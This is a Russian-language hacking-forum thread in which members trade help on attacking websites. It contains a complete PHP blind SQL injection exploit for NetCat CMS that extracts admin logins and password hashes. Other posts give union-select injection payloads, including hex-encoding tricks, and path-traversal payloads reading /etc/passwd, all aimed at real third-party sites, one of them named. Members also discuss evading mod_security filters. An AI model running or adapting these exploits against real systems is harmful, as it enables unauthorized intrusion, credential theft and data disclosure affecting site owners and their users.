Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. _gr34t

    _gr34t Member

    Joined:
    26 Oct 2008
    Messages:
    89
    Likes Received:
    13
    Reputations:
    5
    Народ помогите.
    Есть движок NetCat CMS. Версия предположительно 3.0
    Есть SQL-inj, которая позволяет вытащить логин/пасс админа посимвольным перебором.
    Есть сплоит.
    Для работы нужно PECL_HTTP
    PHP:
    <?

    /*
        AIST NetCat Blind SQL Injection exploit by s4avrd0w [[email protected]]
        Versions affected <= 3.12

        More info: http://www.netcat.ru/

        * tested on version 3.0, 3.12

        usage: 

        # ./NetCat_blind_SQL_exploit.php -s=NetCat_server -u=User_ID

        The options are required:
         -u The user identifier (number in table)
         -s Target for exploiting

        example:

        # ./NetCat_blind_SQL_exploit.php -s=http://localhost/netcat/ -u=2

        [+] Phase 1 brute login.
        [+] Brute 1 symbol...
        ...........a
        [+] Brute 2 symbol...
        ..............d
        [+] Brute 3 symbol...
        .......................m
        [+] Brute 4 symbol...
        ...................i
        [+] Brute 5 symbol...
        ........................n
        [+] Brute 6 symbol...
        .....................................
        [+] Phase 1 successfully finished: admin
        [+] Phase 2 brute password-hash.
        [+] Brute 1 symbol...
        *
        [+] Brute 2 symbol...
        .0
        [+] Brute 3 symbol...
        .0
        [+] Brute N symbol...
        
        <...>
        
        [+] Brute 42 symbol...
        .....................................
        [+] Phase 2 successfully finished: *00a51f3f48415c7d4e8908980d443c29c69b60c9
        
        
        [+] Exploiting is finished successfully
        [+] Login - admin
        [+] MySQL hash - *00a51f3f48415c7d4e8908980d443c29c69b60c9
        [+] Decrypt MySQL hash and login into NetCat CMS.

    */


    function http_connect($query)
    {

        global 
    $server;

        
    $headers = array(
            
    'User-Agent' => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14',
            
    'Referer' => $server
        
    );

        
    $res_http = new HttpRequest($server."modules/poll/?cc=62&PollID=1".$queryHttpRequest::METH_GET);
        
    $res_http->addHeaders($headers);

        
    $t mktime();
        try {
            
    $response $res_http->send()->getBody();

            
    $t mktime() - $t;

            if (
    $t 4)
            {
                return 
    1;
            }
            else
            {
                return 
    0;
            }

        } catch (
    HttpException $exception) {

            print 
    "[-] Not connected";
            exit(
    0);

        }

    }

    function 
    brute($User_id,$table)
    {
        
    $ret_str "";

        if (
    $table == "Password")
        {
            
    $b_str "*1234567890abcdef";
        }
        else
        {
            
    $b_str "1abcdefghijklmnopqrstuvwxyz_234567890 !'#%&()*+,-./:;<=>?@[\]^{|}~абвгдежзийклмнопрстуфхцчшщъыьэюяё";
        }

        
    $b_arr str_split($b_str);

        for (
    $i=1;$i<43;$i++)
        {
            print 
    "[+] Brute $i symbol...\n";

            for (
    $j=0;$j<count($b_arr);$j++)
            {
                
    $brute ord($b_arr[$j]);
                
    $q "/**/AND/**/1=if((ASCII(lower(SUBSTRING((SELECT/**/$table/**/FROM/**/USER/**/limit/**/$User_id,1),$i,1))))=$brute,benchmark(1,benchmark(2000000,md5(now()))),0)";

                if (
    http_connect($q))
                {
                    
    $ret_str=$ret_str.$b_arr[$j];
                    print 
    $b_arr[$j]."\n";
                    break;
                }
                print 
    ".";


            }

            if (
    $j == count($b_arr)) break;
        }

        return 
    $ret_str;
    }


    function 
    help_argc($script_name)
    {
    print 
    "
    usage:

    # ./"
    .$script_name." -s=NetCat_server -u=User_ID

    The options are required:
    -u The user identifier (number in table)
    -s Target for exploiting

    example:

    # ./"
    .$script_name." -s=http://localhost/netcat/ -u=1
    [+] Phase 1 brute login.
    [+] Brute 1 symbol...
    ..1
    [+] Brute 2 symbol...
    .....................................
    [+] Phase 1 successfully finished: 1
    [+] Phase 2 brute password-hash.
    [+] Brute 1 symbol...
    .....................................
    [+] Phase 2 successfully finished:


    [+] Exploiting is finished successfully
    [+] Login - 1
    [+] MySQL hash -
    [+] You can login into NetCat CMS with the empty password
    "
    ;
    }

    function 
    successfully($login,$hash)
    {
    print 
    "

    [+] Exploiting is finished successfully
    [+] Login - 
    $login
    [+] MySQL hash - 
    $hash
    "
    ;

    if (
    $hash) print "[+] Decrypt MySQL hash and login into NetCat CMS.\n";
    else print 
    "[+] You can login into NetCat CMS with the empty password\n";

    }

    if ((
    $argc != 3) || in_array($argv[1], array('--help''-help''-h''-?')))
    {
        
    help_argc($argv[0]);
        exit(
    0);
    }
    else
    {
        
    $ARG = array(); 
        foreach (
    $argv as $arg) { 
            if (
    strpos($arg'-') === 0) { 
                
    $key substr($arg,1,1);
                if (!isset(
    $ARG[$key])) $ARG[$key] = substr($arg,3,strlen($arg)); 
            } 
        }

        if (
    $ARG[s] && $ARG[u])
        {
            
    $server $ARG[s];
            
    $User_id intval($ARG[u]);
            
    $User_id--;

            print 
    "[+] Phase 1 brute login.\n";
            
    $login brute($User_id,"Login");
            print 
    "\n[+] Phase 1 successfully finished: $login\n";

            print 
    "[+] Phase 2 brute password-hash.\n";
            
    $hash brute($User_id,"Password");
            print 
    "\n[+] Phase 2 successfully finished: $hash\n";

            
    successfully($login,$hash);
        }
        else
        {
            
    help_argc($argv[0]);
            exit(
    0);
        }

    }

    ?>
    Там, как я понял специально сделали ошибки.
    Я исправил так:
    PHP:
    <?
    ...
    function 
    brute($User_id,$table) {
    ...
                
    $q "/**/AND/**/1=if((ASCII(lower(SUBSTRING((SELECT/**/$table/**/FROM/**/USER/**/WHERE/**/[B][U]User_ID=$User_id[/U][/B]/**/limit/**/0,1),$i,1))))=$brute,benchmark(1,benchmark(2000000,md5(now()))),0)";
    ...
    }
    ...
    function 
    successfully($login,$hash)
    {
    ...
    //        $User_id--;
    ...
    }
    ?>
    Но всё равно не пашет. Коннектится к хосту, пишет, что перебирает логин...................... пасс.............. и выдаёт, что всё подобрал:
    логин пустой и пасс пустой.
    :(((
     
  2. 4adr0s

    4adr0s Elder - Старейшина

    Joined:
    14 Dec 2007
    Messages:
    75
    Likes Received:
    11
    Reputations:
    0
    Делаю такой запрос:
    HTML:
    http://www.xxx.com/index.phtml?page=news&id=-1+union+select+1,2,3,4,5,column_name,7,8+from+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='users'+LIMIT+1,1/*
    А в ответ мне дулю вот такую:

    PHP:
    Error in query 2 You have an error in your SQL syntaxcheck the manual that corresponds to your MySQL server version for the right syntax to use near '\'users\' LIMIT 1,1/* and rs.status='1' and r.id=rs.id_rubric' at line 4
    wtf, товарищи? что не так? Может кавычка не та? ))
     
  3. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    494
    Likes Received:
    532
    Reputations:
    158
    2 4adr0s
    стоят магик_квотесы, экранируются кавычки, нужно захексить
    +WHERE+TABLE_NAME=0x7573657273+limit+1,1/*
     
  4. 4adr0s

    4adr0s Elder - Старейшина

    Joined:
    14 Dec 2007
    Messages:
    75
    Likes Received:
    11
    Reputations:
    0
    Не канает, родной :(


    PHP:
    Error in query 2 You have an error in your SQL syntaxcheck the manual that corresponds to your MySQL server version for the right syntax to use near '/* and rs.status='1' and r.id=rs.id_rubric' at line 4
    и так тоже ('users')
    +WHERE+TABLE_NAME=0x27757365727327+limit+1,1/*

    не канает...
     
  5. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    4adr0s
    Ты читать умеешь? А поиском пользоваться?
    Переведи ошибку, или хотя-бы просто ПОСМОТРИ на неё там написано. что комментарий не тот "/*"
    Точнее ошибка, возле комментария. Так поменяй его. Или дай линк, зачем это гадание нужно

    Есть закреплённая тема в которой все такие вопросы собраны, они уже 200 раз задавались
     
    1 person likes this.
  6. 4adr0s

    4adr0s Elder - Старейшина

    Joined:
    14 Dec 2007
    Messages:
    75
    Likes Received:
    11
    Reputations:
    0
    Насяльника! Зачем ругаися? )

    Понял, все сделал. Страница открылась, но нифига не вылезло.

    PHP:
    http://www.***.com/index.phtml?page=news&id=-1+union+select+1,2,3,4,5,column_name,7,8+from+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x27757365727327+LIMIT+1,1+--
     
    #7166 4adr0s, 19 May 2009
    Last edited: 19 May 2009
  7. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    А темку мою поленился почитать, да? А там написано, что в хексе кавычки не нужны :)

    https://forum.antichat.ru/thread104591.html
    Вопрос №4

    Держи
    http://www.***.com/index.phtml?page=news&id=-1+union+select+column_name,2,3,4,5,6,7,8+from+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x7573657273+LIMIT+1,1--+
     
    #7167 Kakoytoxaker, 19 May 2009
    Last edited: 19 May 2009
  8. 4adr0s

    4adr0s Elder - Старейшина

    Joined:
    14 Dec 2007
    Messages:
    75
    Likes Received:
    11
    Reputations:
    0
    Сенсей, эту тему в глаза не видел, но теперь почитаю.

    Т.е. все дело было в том, чтобы использовать другое поле для вывода??
     
  9. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    дело было в том, что когда ты искал наблицу, т.е. where table_name, ты в hex закодировал имя таблицы+', а надо без кавычек.
     
    1 person likes this.
  10. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    нет, просто я вывел в другое поле, оно поярче

    1 кавычки как и писал Iceangel_
    2 коментарий
    3 Кавычки в хексе не нужны


    Вот твоё
    0x27757365727327-- 'users'

    А вот моё
    0x7573657273 -- users
     
    2 people like this.
  11. _gr34t

    _gr34t Member

    Joined:
    26 Oct 2008
    Messages:
    89
    Likes Received:
    13
    Reputations:
    5
    Народ ответьте мне плиз. Я уже нереально запарился искать. Похоже, что этот NetCat - посследняя надежда. Кто хорошо в PHP шарит, проверьте пожалуйтса скрипт! http://forum.antichat.ru/showpost.php?p=1284711&postcount=7251
     
  12. Snap

    Snap Elder - Старейшина

    Joined:
    5 Feb 2007
    Messages:
    61
    Likes Received:
    33
    Reputations:
    -4
    Помогите разбраться реально ли тут что нибудь сделать:

    http://www.bmwstyle.ru/bmw.php?module=../config

    вывод:
    При попытке вставить что либо выводит:
    ЧТо не может найти фаил
    Заранее спасибо...
     
  13. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Code:
    http://www.bmwstyle.ru/bmw.php?module=../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00
    
    да, можно скорее всего, только прочитай статью тут про альтернативу нулл-байту
     
  14. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    http://www.bmwstyle.ru/bmw.php?module=../../index
    это LFI. в значении параметра указывается файл. к этому значению добавляется путь (modules/) и расширение (.php). Нулл-байт не катит. Значит, использовать этот баг получится при условии, что ты зальешь файл с расширением php и будешь знать путь к нему. или как сказал pashkela про альтернативу нулл-байту.
     
    #7174 AFoST, 20 May 2009
    Last edited: 20 May 2009
  15. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Code:
    http://www.bmwstyle.ru/bmw.php?cat=3/**/union/**/select/**/1,version(),3,4,5,6/**/limit/**/1,1
    
    шелл не залить, т.к. маджик квотс он + file_priv=n. Пятая ветка

    Пробивай админку. А вообще бы .ru не советовал в принципе хекать
     
    #7175 Pashkela, 20 May 2009
    Last edited: 20 May 2009
  16. Snap

    Snap Elder - Старейшина

    Joined:
    5 Feb 2007
    Messages:
    61
    Likes Received:
    33
    Reputations:
    -4

    C SQL'eм я и так давно вопрос решил разобрал и тд. но админка не пашет... =(

    Меня больше не хек а методы обхода интересуют в данной ситуации, сайт случайно попал =)
     
  17. laedafess

    laedafess Member

    Joined:
    11 Feb 2009
    Messages:
    70
    Likes Received:
    29
    Reputations:
    15
    Code:
    http://www.bmwstyle.ru/bmw.php?module=../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././
     
    2 people like this.
  18. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    method not implemented

    mod security режет видать... пробовал в разных регистрах писать юнион селект, постом слать - не проходит..

    что нибудь можно сделать?
     
    1 person likes this.
  19. laedafess

    laedafess Member

    Joined:
    11 Feb 2009
    Messages:
    70
    Likes Received:
    29
    Reputations:
    15
    Угу, запрет на "union+select" и "substring". Хз че там делать.
     
  20. cupper

    cupper Elder - Старейшина

    Joined:
    6 Jun 2007
    Messages:
    369
    Likes Received:
    92
    Reputations:
    5
    вопрос по XSS.
    Объясните мне пжалуста, вот к примеру есть на неком сайте пассивная XSS, предположим строка поиска, на вбивании туда поискового запроса в url он потом неотображается (т.е. непишется переменная=мой_запрос) как в этом случаю испольщовать эту пассивную XSS ?

    негневайтесь, я только учусь.
     
Thread Status:
Not open for further replies.